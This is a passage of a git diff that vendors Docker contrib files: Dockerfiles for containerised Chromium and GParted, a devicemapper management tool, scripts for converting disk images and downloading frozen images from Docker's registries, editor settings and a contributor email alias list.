"($help)--userland-proxy[Use userland proxy for loopback traffic]" \ + "($help -v --version)"{-v,--version}"[Print version information and quit]" \ + "($help -): :->command" \ + "($help -)*:: :->option-or-argument" && ret=0 + + local host=${opt_args[-H]}${opt_args[--host]} + local config=${opt_args[--config]} + local docker_options="${host:+--host $host} ${config:+--config $config}" + + case $state in + (command) + __docker_commands && ret=0 + ;; + (option-or-argument) + curcontext=${curcontext%:*:*}:docker-$words[1]: + __docker_subcommand && ret=0 + ;; + esac + + return ret +} + +_dockerd() { + integer ret=1 + 
words[1]='daemon' + __docker_subcommand && ret=0 + return ret +} + +_docker "$@" + +# Local Variables: +# mode: Shell-Script +# sh-indentation: 4 +# indent-tabs-mode: nil +# sh-basic-offset: 4 +# End: +# vim: ft=zsh sw=4 ts=4 et diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/README.md b/vendor/github.com/docker/docker/contrib/desktop-integration/README.md new file mode 100644 index 0000000000..85a01b9ee9 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/README.md @@ -0,0 +1,11 @@ +Desktop Integration +=================== + +The ./contrib/desktop-integration contains examples of typical dockerized +desktop applications. + +Examples +======== + +* Chromium: ./chromium/Dockerfile shows a way to dockerize a common application +* Gparted: ./gparted/Dockerfile shows a way to dockerize a common application w devices diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile new file mode 100644 index 0000000000..5cacd1f999 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile @@ -0,0 +1,36 @@ +# VERSION: 0.1 +# DESCRIPTION: Create chromium container with its dependencies +# AUTHOR: Jessica Frazelle +# COMMENTS: +# This file describes how to build a Chromium container with all +# dependencies installed. It uses native X11 unix socket. +# Tested on Debian Jessie +# USAGE: +# # Download Chromium Dockerfile +# wget http://raw.githubusercontent.com/docker/docker/master/contrib/desktop-integration/chromium/Dockerfile +# +# # Build chromium image +# docker build -t chromium . +# +# # Run stateful data-on-host chromium. 
For ephemeral, remove -v /data/chromium:/data +# docker run -v /data/chromium:/data -v /tmp/.X11-unix:/tmp/.X11-unix \ +# -e DISPLAY=unix$DISPLAY chromium + +# # To run stateful dockerized data containers +# docker run --volumes-from chromium-data -v /tmp/.X11-unix:/tmp/.X11-unix \ +# -e DISPLAY=unix$DISPLAY chromium + +# Base docker image +FROM debian:jessie +MAINTAINER Jessica Frazelle + +# Install Chromium +RUN apt-get update && apt-get install -y \ + chromium \ + chromium-l10n \ + libcanberra-gtk-module \ + libexif-dev \ + --no-install-recommends + +# Autorun chromium +CMD ["/usr/bin/chromium", "--no-sandbox", "--user-data-dir=/data"] diff --git a/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile new file mode 100644 index 0000000000..3ddb23208d --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile @@ -0,0 +1,31 @@ +# VERSION: 0.1 +# DESCRIPTION: Create gparted container with its dependencies +# AUTHOR: Jessica Frazelle +# COMMENTS: +# This file describes how to build a gparted container with all +# dependencies installed. It uses native X11 unix socket. +# Tested on Debian Jessie +# USAGE: +# # Download gparted Dockerfile +# wget http://raw.githubusercontent.com/docker/docker/master/contrib/desktop-integration/gparted/Dockerfile +# +# # Build gparted image +# docker build -t gparted . 
+# +# docker run -v /tmp/.X11-unix:/tmp/.X11-unix \ +# --device=/dev/sda:/dev/sda \ +# -e DISPLAY=unix$DISPLAY gparted +# + +# Base docker image +FROM debian:jessie +MAINTAINER Jessica Frazelle + +# Install Gparted and its dependencies +RUN apt-get update && apt-get install -y \ + gparted \ + libcanberra-gtk-module \ + --no-install-recommends + +# Autorun gparted +CMD ["/usr/sbin/gparted"] diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md b/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md new file mode 100644 index 0000000000..6c54d5995f --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/README.md @@ -0,0 +1,14 @@ +Docker device tool for devicemapper storage driver backend +=================== + +The ./contrib/docker-device-tool contains a tool to manipulate devicemapper thin-pool. + +Compile +======== + + $ make shell + ## inside build container + $ go build contrib/docker-device-tool/device_tool.go + + # if devicemapper version is old and compilation fails, compile with `libdm_no_deferred_remove` tag + $ go build -tags libdm_no_deferred_remove contrib/docker-device-tool/device_tool.go diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go new file mode 100644 index 0000000000..906d064df6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go @@ -0,0 +1,176 @@ +// +build !windows,!solaris + +package main + +import ( + "flag" + "fmt" + "os" + "path" + "sort" + "strconv" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver/devmapper" + "github.com/docker/docker/pkg/devicemapper" +) + +func usage() { + fmt.Fprintf(os.Stderr, "Usage: %s [status] | [list] | [device id] | [resize new-pool-size] | [snap new-id base-id] | [remove id] | [mount id mountpoint]\n", os.Args[0]) + flag.PrintDefaults() + os.Exit(1) +} 
+ +func byteSizeFromString(arg string) (int64, error) { + digits := "" + rest := "" + last := strings.LastIndexAny(arg, "0123456789") + if last >= 0 { + digits = arg[:last+1] + rest = arg[last+1:] + } + + val, err := strconv.ParseInt(digits, 10, 64) + if err != nil { + return val, err + } + + rest = strings.ToLower(strings.TrimSpace(rest)) + + var multiplier int64 = 1 + switch rest { + case "": + multiplier = 1 + case "k", "kb": + multiplier = 1024 + case "m", "mb": + multiplier = 1024 * 1024 + case "g", "gb": + multiplier = 1024 * 1024 * 1024 + case "t", "tb": + multiplier = 1024 * 1024 * 1024 * 1024 + default: + return 0, fmt.Errorf("Unknown size unit: %s", rest) + } + + return val * multiplier, nil +} + +func main() { + root := flag.String("r", "/var/lib/docker", "Docker root dir") + flDebug := flag.Bool("D", false, "Debug mode") + + flag.Parse() + + if *flDebug { + os.Setenv("DEBUG", "1") + logrus.SetLevel(logrus.DebugLevel) + } + + if flag.NArg() < 1 { + usage() + } + + args := flag.Args() + + home := path.Join(*root, "devicemapper") + devices, err := devmapper.NewDeviceSet(home, false, nil, nil, nil) + if err != nil { + fmt.Println("Can't initialize device mapper: ", err) + os.Exit(1) + } + + switch args[0] { + case "status": + status := devices.Status() + fmt.Printf("Pool name: %s\n", status.PoolName) + fmt.Printf("Data Loopback file: %s\n", status.DataLoopback) + fmt.Printf("Metadata Loopback file: %s\n", status.MetadataLoopback) + fmt.Printf("Sector size: %d\n", status.SectorSize) + fmt.Printf("Data use: %d of %d (%.1f %%)\n", status.Data.Used, status.Data.Total, 100.0*float64(status.Data.Used)/float64(status.Data.Total)) + fmt.Printf("Metadata use: %d of %d (%.1f %%)\n", status.Metadata.Used, status.Metadata.Total, 100.0*float64(status.Metadata.Used)/float64(status.Metadata.Total)) + break + case "list": + ids := devices.List() + sort.Strings(ids) + for _, id := range ids { + fmt.Println(id) + } + break + case "device": + if flag.NArg() < 2 { + usage() + 
} + status, err := devices.GetDeviceStatus(args[1]) + if err != nil { + fmt.Println("Can't get device info: ", err) + os.Exit(1) + } + fmt.Printf("Id: %d\n", status.DeviceID) + fmt.Printf("Size: %d\n", status.Size) + fmt.Printf("Transaction Id: %d\n", status.TransactionID) + fmt.Printf("Size in Sectors: %d\n", status.SizeInSectors) + fmt.Printf("Mapped Sectors: %d\n", status.MappedSectors) + fmt.Printf("Highest Mapped Sector: %d\n", status.HighestMappedSector) + break + case "resize": + if flag.NArg() < 2 { + usage() + } + + size, err := byteSizeFromString(args[1]) + if err != nil { + fmt.Println("Invalid size: ", err) + os.Exit(1) + } + + err = devices.ResizePool(size) + if err != nil { + fmt.Println("Error resizing pool: ", err) + os.Exit(1) + } + + break + case "snap": + if flag.NArg() < 3 { + usage() + } + + err := devices.AddDevice(args[1], args[2], nil) + if err != nil { + fmt.Println("Can't create snap device: ", err) + os.Exit(1) + } + break + case "remove": + if flag.NArg() < 2 { + usage() + } + + err := devicemapper.RemoveDevice(args[1]) + if err != nil { + fmt.Println("Can't remove device: ", err) + os.Exit(1) + } + break + case "mount": + if flag.NArg() < 3 { + usage() + } + + err := devices.MountDevice(args[1], args[2], "") + if err != nil { + fmt.Println("Can't create snap device: ", err) + os.Exit(1) + } + break + default: + fmt.Printf("Unknown command %s\n", args[0]) + usage() + + os.Exit(1) + } + + return +} diff --git a/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go new file mode 100644 index 0000000000..da29a2cadf --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go @@ -0,0 +1,4 @@ +package main + +func main() { +} diff --git a/vendor/github.com/docker/docker/contrib/dockerize-disk.sh b/vendor/github.com/docker/docker/contrib/dockerize-disk.sh new file mode 100755 index 
0000000000..444e243abe --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/dockerize-disk.sh @@ -0,0 +1,118 @@ +#!/usr/bin/env bash +set -e + +if ! command -v qemu-nbd &> /dev/null; then + echo >&2 'error: "qemu-nbd" not found!' + exit 1 +fi + +usage() { + echo "Convert disk image to docker image" + echo "" + echo "usage: $0 image-name disk-image-file [ base-image ]" + echo " ie: $0 cirros:0.3.3 cirros-0.3.3-x86_64-disk.img" + echo " $0 ubuntu:cloud ubuntu-14.04-server-cloudimg-amd64-disk1.img ubuntu:14.04" +} + +if [ "$#" -lt 2 ]; then + usage + exit 1 +fi + +CURDIR=$(pwd) + +image_name="${1%:*}" +image_tag="${1#*:}" +if [ "$image_tag" == "$1" ]; then + image_tag="latest" +fi + +disk_image_file="$2" +docker_base_image="$3" + +block_device=/dev/nbd0 + +builddir=$(mktemp -d) + +cleanup() { + umount "$builddir/disk_image" || true + umount "$builddir/workdir" || true + qemu-nbd -d $block_device &> /dev/null || true + rm -rf $builddir +} +trap cleanup EXIT + +# Mount disk image +modprobe nbd max_part=63 +qemu-nbd -rc ${block_device} -P 1 "$disk_image_file" +mkdir "$builddir/disk_image" +mount -o ro ${block_device} "$builddir/disk_image" + +mkdir "$builddir/workdir" +mkdir "$builddir/diff" + +base_image_mounts="" + +# Unpack base image +if [ -n "$docker_base_image" ]; then + mkdir -p "$builddir/base" + docker pull "$docker_base_image" + docker save "$docker_base_image" | tar -xC "$builddir/base" + + image_id=$(docker inspect -f "{{.Id}}" "$docker_base_image") + while [ -n "$image_id" ]; do + mkdir -p "$builddir/base/$image_id/layer" + tar -xf "$builddir/base/$image_id/layer.tar" -C "$builddir/base/$image_id/layer" + + base_image_mounts="${base_image_mounts}:$builddir/base/$image_id/layer=ro+wh" + image_id=$(docker inspect -f "{{.Parent}}" "$image_id") + done +fi + +# Mount work directory +mount -t aufs -o "br=$builddir/diff=rw${base_image_mounts},dio,xino=/dev/shm/aufs.xino" none "$builddir/workdir" + +# Update files +cd $builddir +LC_ALL=C diff -rq disk_image 
workdir \ + | sed -re "s|Only in workdir(.*?): |DEL \1/|g;s|Only in disk_image(.*?): |ADD \1/|g;s|Files disk_image/(.+) and workdir/(.+) differ|UPDATE /\1|g" \ + | while read action entry; do + case "$action" in + ADD|UPDATE) + cp -a "disk_image$entry" "workdir$entry" + ;; + DEL) + rm -rf "workdir$entry" + ;; + *) + echo "Error: unknown diff line: $action $entry" >&2 + ;; + esac + done + +# Pack new image +new_image_id="$(for i in $(seq 1 32); do printf "%02x" $(($RANDOM % 256)); done)" +mkdir -p $builddir/result/$new_image_id +cd diff +tar -cf $builddir/result/$new_image_id/layer.tar * +echo "1.0" > $builddir/result/$new_image_id/VERSION +cat > $builddir/result/$new_image_id/json <<-EOS +{ "docker_version": "1.4.1" +, "id": "$new_image_id" +, "created": "$(date -u +%Y-%m-%dT%H:%M:%S.%NZ)" +EOS + +if [ -n "$docker_base_image" ]; then + image_id=$(docker inspect -f "{{.Id}}" "$docker_base_image") + echo ", \"parent\": \"$image_id\"" >> $builddir/result/$new_image_id/json +fi + +echo "}" >> $builddir/result/$new_image_id/json + +echo "{\"$image_name\":{\"$image_tag\":\"$new_image_id\"}}" > $builddir/result/repositories + +cd $builddir/result + +# mkdir -p $CURDIR/$image_name +# cp -r * $CURDIR/$image_name +tar -c * | docker load diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh new file mode 100755 index 0000000000..29d7ff59fd --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh @@ -0,0 +1,108 @@ +#!/bin/bash +set -e + +# hello-world latest ef872312fe1b 3 months ago 910 B +# hello-world latest ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9 3 months ago 910 B + +# debian latest f6fab3b798be 10 weeks ago 85.1 MB +# debian latest f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd 10 weeks ago 85.1 MB + +if ! command -v curl &> /dev/null; then + echo >&2 'error: "curl" not found!' 
+ exit 1 +fi + +usage() { + echo "usage: $0 dir image[:tag][@image-id] ..." + echo " ie: $0 /tmp/hello-world hello-world" + echo " $0 /tmp/debian-jessie debian:jessie" + echo " $0 /tmp/old-hello-world hello-world@ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9" + echo " $0 /tmp/old-debian debian:latest@f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd" + [ -z "$1" ] || exit "$1" +} + +dir="$1" # dir for building tar in +shift || usage 1 >&2 + +[ $# -gt 0 -a "$dir" ] || usage 2 >&2 +mkdir -p "$dir" + +# hacky workarounds for Bash 3 support (no associative arrays) +images=() +rm -f "$dir"/tags-*.tmp +# repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."' + +while [ $# -gt 0 ]; do + imageTag="$1" + shift + image="${imageTag%%[:@]*}" + tag="${imageTag#*:}" + imageId="${tag##*@}" + [ "$imageId" != "$tag" ] || imageId= + [ "$tag" != "$imageTag" ] || tag='latest' + tag="${tag%@*}" + + imageFile="${image//\//_}" # "/" can't be in filenames :) + + token="$(curl -sSL -o /dev/null -D- -H 'X-Docker-Token: true' "https://index.docker.io/v1/repositories/$image/images" | tr -d '\r' | awk -F ': *' '$1 == "X-Docker-Token" { print $2 }')" + + if [ -z "$imageId" ]; then + imageId="$(curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/repositories/$image/tags/$tag")" + imageId="${imageId//\"/}" + fi + + ancestryJson="$(curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/ancestry")" + if [ "${ancestryJson:0:1}" != '[' ]; then + echo >&2 "error: /v1/images/$imageId/ancestry returned something unexpected:" + echo >&2 " $ancestryJson" + exit 1 + fi + + IFS=',' + ancestry=( ${ancestryJson//[\[\] \"]/} ) + unset IFS + + if [ -s "$dir/tags-$imageFile.tmp" ]; then + echo -n ', ' >> "$dir/tags-$imageFile.tmp" + else + images=( "${images[@]}" "$image" ) + fi + echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp" + + echo "Downloading '$imageTag' (${#ancestry[@]} layers)..." 
+ for imageId in "${ancestry[@]}"; do + mkdir -p "$dir/$imageId" + echo '1.0' > "$dir/$imageId/VERSION" + + curl -sSL -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/json" -o "$dir/$imageId/json" + + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$imageId/layer.tar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${imageId:0:12}" + continue + fi + curl -SL --progress -H "Authorization: Token $token" "https://registry-1.docker.io/v1/images/$imageId/layer" -o "$dir/$imageId/layer.tar" # -C - + done + echo +done + +echo -n '{' > "$dir/repositories" +firstImage=1 +for image in "${images[@]}"; do + imageFile="${image//\//_}" # "/" can't be in filenames :) + + [ "$firstImage" ] || echo -n ',' >> "$dir/repositories" + firstImage= + echo -n $'\n\t' >> "$dir/repositories" + echo -n '"'"$image"'": { '"$(cat "$dir/tags-$imageFile.tmp")"' }' >> "$dir/repositories" +done +echo -n $'\n}\n' >> "$dir/repositories" + +rm -f "$dir"/tags-*.tmp + +echo "Download of images into '$dir' complete." +echo "Use something like the following to load the result into a Docker daemon:" +echo " tar -cC '$dir' . | docker load" diff --git a/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh new file mode 100755 index 0000000000..111e3fa2ba --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh @@ -0,0 +1,121 @@ +#!/bin/bash +set -e + +# hello-world latest ef872312fe1b 3 months ago 910 B +# hello-world latest ef872312fe1bbc5e05aae626791a47ee9b032efa8f3bda39cc0be7b56bfe59b9 3 months ago 910 B + +# debian latest f6fab3b798be 10 weeks ago 85.1 MB +# debian latest f6fab3b798be3174f45aa1eb731f8182705555f89c9026d8c1ef230cbf8301dd 10 weeks ago 85.1 MB + +if ! 
command -v curl &> /dev/null; then + echo >&2 'error: "curl" not found!' + exit 1 +fi + +usage() { + echo "usage: $0 dir image[:tag][@digest] ..." + echo " $0 /tmp/old-hello-world hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7" + [ -z "$1" ] || exit "$1" +} + +dir="$1" # dir for building tar in +shift || usage 1 >&2 + +[ $# -gt 0 -a "$dir" ] || usage 2 >&2 +mkdir -p "$dir" + +# hacky workarounds for Bash 3 support (no associative arrays) +images=() +rm -f "$dir"/tags-*.tmp +# repositories[busybox]='"latest": "...", "ubuntu-14.04": "..."' + +while [ $# -gt 0 ]; do + imageTag="$1" + shift + image="${imageTag%%[:@]*}" + imageTag="${imageTag#*:}" + digest="${imageTag##*@}" + tag="${imageTag%%@*}" + + # add prefix library if passed official image + if [[ "$image" != *"/"* ]]; then + image="library/$image" + fi + + imageFile="${image//\//_}" # "/" can't be in filenames :) + + token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" + + manifestJson="$(curl -sSL -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/manifests/$digest")" + if [ "${manifestJson:0:1}" != '{' ]; then + echo >&2 "error: /v2/$image/manifests/$digest returned something unexpected:" + echo >&2 " $manifestJson" + exit 1 + fi + + layersFs=$(echo "$manifestJson" | jq --raw-output '.fsLayers | .[] | .blobSum') + + IFS=$'\n' + # bash v4 on Windows CI requires CRLF separator + if [ "$(go env GOHOSTOS)" = 'windows' ]; then + major=$(echo ${BASH_VERSION%%[^0.9]} | cut -d. 
-f1) + if [ "$major" -ge 4 ]; then + IFS=$'\r\n' + fi + fi + layers=( ${layersFs} ) + unset IFS + + history=$(echo "$manifestJson" | jq '.history | [.[] | .v1Compatibility]') + imageId=$(echo "$history" | jq --raw-output .[0] | jq --raw-output .id) + + if [ -s "$dir/tags-$imageFile.tmp" ]; then + echo -n ', ' >> "$dir/tags-$imageFile.tmp" + else + images=( "${images[@]}" "$image" ) + fi + echo -n '"'"$tag"'": "'"$imageId"'"' >> "$dir/tags-$imageFile.tmp" + + echo "Downloading '${image}:${tag}@${digest}' (${#layers[@]} layers)..." + for i in "${!layers[@]}"; do + imageJson=$(echo "$history" | jq --raw-output .[${i}]) + imageId=$(echo "$imageJson" | jq --raw-output .id) + imageLayer=${layers[$i]} + + mkdir -p "$dir/$imageId" + echo '1.0' > "$dir/$imageId/VERSION" + + echo "$imageJson" > "$dir/$imageId/json" + + # TODO figure out why "-C -" doesn't work here + # "curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume." + # "HTTP/1.1 416 Requested Range Not Satisfiable" + if [ -f "$dir/$imageId/layer.tar" ]; then + # TODO hackpatch for no -C support :'( + echo "skipping existing ${imageId:0:12}" + continue + fi + token="$(curl -sSL "https://auth.docker.io/token?service=registry.docker.io&scope=repository:$image:pull" | jq --raw-output .token)" + curl -SL --progress -H "Authorization: Bearer $token" "https://registry-1.docker.io/v2/$image/blobs/$imageLayer" -o "$dir/$imageId/layer.tar" # -C - + done + echo +done + +echo -n '{' > "$dir/repositories" +firstImage=1 +for image in "${images[@]}"; do + imageFile="${image//\//_}" # "/" can't be in filenames :) + image="${image#library\/}" + + [ "$firstImage" ] || echo -n ',' >> "$dir/repositories" + firstImage= + echo -n $'\n\t' >> "$dir/repositories" + echo -n '"'"$image"'": { '"$(cat "$dir/tags-$imageFile.tmp")"' }' >> "$dir/repositories" +done +echo -n $'\n}\n' >> "$dir/repositories" + +rm -f "$dir"/tags-*.tmp + +echo "Download of images into '$dir' complete." 
+echo "Use something like the following to load the result into a Docker daemon:" +echo " tar -cC '$dir' . | docker load" diff --git a/vendor/github.com/docker/docker/contrib/editorconfig b/vendor/github.com/docker/docker/contrib/editorconfig new file mode 100644 index 0000000000..97eda89a4b --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/editorconfig @@ -0,0 +1,13 @@ +root = true + +[*] +end_of_line = lf +insert_final_newline = true +charset = utf-8 +indent_style = tab +indent_size = 4 +trim_trailing_whitespace = true + +[*.md] +indent_size = 2 +indent_style = space diff --git a/vendor/github.com/docker/docker/contrib/gitdm/aliases b/vendor/github.com/docker/docker/contrib/gitdm/aliases new file mode 100644 index 0000000000..dd5dd34335 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/aliases @@ -0,0 +1,148 @@ +Danny.Yates@mailonline.co.uk danny@codeaholics.org +KenCochrane@gmail.com kencochrane@gmail.com +LÉVEIL thomasleveil@gmail.com +Vincent.Bernat@exoscale.ch bernat@luffy.cx +acidburn@docker.com jess@docker.com +admin@jtlebi.fr jt@yadutaf.fr +ahmetalpbalkan@gmail.com ahmetb@microsoft.com +aj@gandi.net aj@gandi.net +albers@users.noreply.github.com github@albersweb.de +alexander.larsson@gmail.com alexl@redhat.com +amurdaca@redhat.com antonio.murdaca@gmail.com +amy@gandi.net aj@gandi.net +andrew.weiss@microsoft.com andrew.weiss@outlook.com +angt@users.noreply.github.com adrien@gallouet.fr +ankushagarwal@users.noreply.github.com ankushagarwal11@gmail.com +anonymouse2048@gmail.com lheckemann@twig-world.com +anusha@docker.com anusha.ragunathan@docker.com +asarai@suse.com asarai@suse.de +avi.miller@gmail.com avi.miller@oracle.com +bernat@luffy.cx Vincent.Bernat@exoscale.ch +bgoff@cpuguy83-mbp.home cpuguy83@gmail.com +brandon@ifup.co brandon@ifup.org +brent@docker.com brent.salisbury@docker.com +charmes.guillaume@gmail.com guillaume.charmes@docker.com +chenchun.feed@gmail.com ramichen@tencent.com +chooper@plumata.com 
charles.hooper@dotcloud.com +crosby.michael@gmail.com michael@docker.com +crosbymichael@gmail.com michael@docker.com +cyphar@cyphar.com asarai@suse.de +daehyeok@daehyeok-ui-MacBook-Air.local daehyeok@gmail.com +daehyeok@daehyeokui-MacBook-Air.local daehyeok@gmail.com +daniel.norberg@gmail.com dano@spotify.com +daniel@dotcloud.com daniel.mizyrycki@dotcloud.com +darren@rancher.com darren.s.shepherd@gmail.com +dave@dtucker.co.uk dt@docker.com +dev@vvieux.com victor.vieux@docker.com +dgasienica@zynga.com daniel@gasienica.ch +dnephin@gmail.com dnephin@docker.com +dominikh@fork-bomb.org dominik@honnef.co +dqminh89@gmail.com dqminh@cloudflare.com +dsxiao@dataman-inc.com dxiao@redhat.com +duglin@users.noreply.github.com dug@us.ibm.com +eric.hanchrow@gmail.com ehanchrow@ine.com +erik+github@hollensbe.org github@hollensbe.org +estesp@gmail.com estesp@linux.vnet.ibm.com +ewindisch@docker.com eric@windisch.us +f.joffrey@gmail.com joffrey@docker.com +fkautz@alumni.cmu.edu fkautz@redhat.com +frank.rosquin@gmail.com frank.rosquin+github@gmail.com +gh@mattyw.net mattyw@me.com +git@julienbordellier.com julienbordellier@gmail.com +github@metaliveblog.com github@developersupport.net +github@srid.name sridharr@activestate.com +guillaume.charmes@dotcloud.com guillaume.charmes@docker.com +guillaume@charmes.net guillaume.charmes@docker.com +guillaume@docker.com guillaume.charmes@docker.com +guillaume@dotcloud.com guillaume.charmes@docker.com +haoshuwei24@gmail.com haosw@cn.ibm.com +hollie.teal@docker.com hollie@docker.com +hollietealok@users.noreply.github.com hollie@docker.com +hsinko@users.noreply.github.com 21551195@zju.edu.cn +iamironbob@gmail.com altsysrq@gmail.com +icecrime@gmail.com arnaud.porterie@docker.com +jatzen@gmail.com jacob@jacobatzen.dk +jeff@allingeek.com jeff.nickoloff@gmail.com +jefferya@programmerq.net jeff@docker.com +jerome.petazzoni@dotcloud.com jerome.petazzoni@dotcloud.com +jfrazelle@users.noreply.github.com jess@docker.com +jhoward@microsoft.com 
John.Howard@microsoft.com +jlhawn@berkeley.edu josh.hawn@docker.com +joffrey@dotcloud.com joffrey@docker.com +john.howard@microsoft.com John.Howard@microsoft.com +jp@enix.org jerome.petazzoni@dotcloud.com +justin.cormack@unikernel.com justin.cormack@docker.com +justin.simonelis@PTS-JSIMON2.toronto.exclamation.com justin.p.simonelis@gmail.com +justin@specialbusservice.com justin.cormack@docker.com +katsuta_soshi@cyberagent.co.jp soshi.katsuta@gmail.com +kuehnle@online.de git.nivoc@neverbox.com +kwk@users.noreply.github.com konrad.wilhelm.kleine@gmail.com +leijitang@gmail.com leijitang@huawei.com +liubin0329@gmail.com liubin0329@users.noreply.github.com +lk4d4math@gmail.com lk4d4@docker.com +louis@dotcloud.com kalessin@kalessin.fr +lsm5@redhat.com lsm5@fedoraproject.org +lyndaoleary@hotmail.com lyndaoleary29@gmail.com +madhu@socketplane.io madhu@docker.com +martins@noironetworks.com aanm90@gmail.com +mary@docker.com mary.anthony@docker.com +mastahyeti@users.noreply.github.com mastahyeti@gmail.com +maztaim@users.noreply.github.com taim@bosboot.org +me@runcom.ninja antonio.murdaca@gmail.com +mheon@mheonlaptop.redhat.com mheon@redhat.com +michael@crosbymichael.com michael@docker.com +mohitsoni1989@gmail.com mosoni@ebay.com +moxieandmore@gmail.com mary.anthony@docker.com +moyses.furtado@wplex.com.br moysesb@gmail.com +msabramo@gmail.com marc@marc-abramowitz.com +mzdaniel@glidelink.net daniel.mizyrycki@dotcloud.com +nathan.leclaire@gmail.com nathan.leclaire@docker.com +nathanleclaire@gmail.com nathan.leclaire@docker.com +ostezer@users.noreply.github.com ostezer@gmail.com +peter@scraperwiki.com p@pwaller.net +princess@docker.com jess@docker.com +proppy@aminche.com proppy@google.com +qhuang@10.0.2.15 h.huangqiang@huawei.com +resouer@gmail.com resouer@163.com +roberto_hashioka@hotmail.com roberto.hashioka@docker.com +root@vagrant-ubuntu-12.10.vagrantup.com daniel.mizyrycki@dotcloud.com +runcom@linux.com antonio.murdaca@gmail.com +runcom@redhat.com antonio.murdaca@gmail.com 
+runcom@users.noreply.github.com antonio.murdaca@gmail.com +s@docker.com solomon@docker.com +shawnlandden@gmail.com shawn@churchofgit.com +singh.gurjeet@gmail.com gurjeet@singh.im +sjoerd@byte.nl sjoerd-github@linuxonly.nl +smahajan@redhat.com shishir.mahajan@redhat.com +solomon.hykes@dotcloud.com solomon@docker.com +solomon@dotcloud.com solomon@docker.com +stefanb@us.ibm.com stefanb@linux.vnet.ibm.com +stevvooe@users.noreply.github.com stephen.day@docker.com +superbaloo+registrations.github@superbaloo.net baloo@gandi.net +tangicolin@gmail.com tangicolin@gmail.com +thaJeztah@users.noreply.github.com github@gone.nl +thatcher@dotcloud.com thatcher@docker.com +thatcher@gmx.net thatcher@docker.com +tibor@docker.com teabee89@gmail.com +tiborvass@users.noreply.github.com teabee89@gmail.com +timruffles@googlemail.com oi@truffles.me.uk +tintypemolly@Ohui-MacBook-Pro.local tintypemolly@gmail.com +tj@init.me tejesh.mehta@gmail.com +tristan.carel@gmail.com tristan@cogniteev.com +unclejack@users.noreply.github.com cristian.staretu@gmail.com +unclejacksons@gmail.com cristian.staretu@gmail.com +vbatts@hashbangbash.com vbatts@redhat.com +victor.vieux@dotcloud.com victor.vieux@docker.com +victor@docker.com victor.vieux@docker.com +victor@dotcloud.com victor.vieux@docker.com +victorvieux@gmail.com victor.vieux@docker.com +vieux@docker.com victor.vieux@docker.com +vincent+github@demeester.fr vincent@sbr.pm +vincent@bernat.im bernat@luffy.cx +vojnovski@gmail.com viktor.vojnovski@amadeus.com +whoshuu@gmail.com huu@prismskylabs.com +xiaods@gmail.com dxiao@redhat.com +xlgao@zju.edu.cn xlgao@zju.edu.cn +yestin.sun@polyera.com sunyi0804@gmail.com +yuchangchun1@huawei.com yuchangchun1@huawei.com +zjaffee@us.ibm.com zij@case.edu diff --git a/vendor/github.com/docker/docker/contrib/gitdm/domain-map b/vendor/github.com/docker/docker/contrib/gitdm/domain-map new file mode 100644 index 0000000000..1f1849e4f6 --- /dev/null +++ b/vendor/github.com/docker/docker/contrib/gitdm/domain-map @@ -0,0 
